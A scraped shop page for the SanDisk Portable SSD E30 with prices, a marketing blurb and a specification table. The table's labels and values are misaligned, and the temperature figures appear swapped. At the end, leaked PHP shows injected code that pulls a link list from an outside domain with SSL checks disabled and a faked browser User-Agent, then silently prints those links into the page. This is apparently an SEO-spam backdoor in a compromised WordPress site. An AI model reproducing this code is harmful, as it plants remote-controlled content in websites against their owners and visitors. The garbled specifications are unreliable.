SanDisk Portable SSD E30 ( 480GB/1TB/2 TB ) 520MB/s Type-C

Price range: RM399.00 through RM1,190.00

SKU: N/A Category:

SanDisk Portable SSD

Life’s best moments happen fast. To make sure you don’t miss them, you need portable, reliable storage. With the SanDisk® Portable SSD, you can store your content and memories on a fast drive that fits seamlessly into your mobile lifestyle. From the brand trusted by professional photographers, the SanDisk Portable SSD provides fast solid state performance in a rugged but affordable storage solution.

SanDisk Portable SSD Specifications

Dimensions (H x W x L):

Operating temperature:

Storage temperature:

Interface:

Shock Resistant:

Vibration Resistant:

Warranty:

Available capacities:

3.81 x 1.85 x 0.39 in. (96.90 x 46.90 x 9.91 mm)

–20°C to 85°C

USB 3.2 Gen 2

up to 1500G

5 gRMS, 10-2000 Hz

0°C to 45°C

480GB, 1TB, 2TB*

3-year limited¹ [US Only]; 3-year [ROW]¹

Size

1 TB, 2 TB, 480 GB

Reviews

There are no reviews yet.

Be the first to review “SanDisk Portable SSD E30 ( 480GB/1TB/2 TB ) 520MB/s Type-C”
Scroll to Top
$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }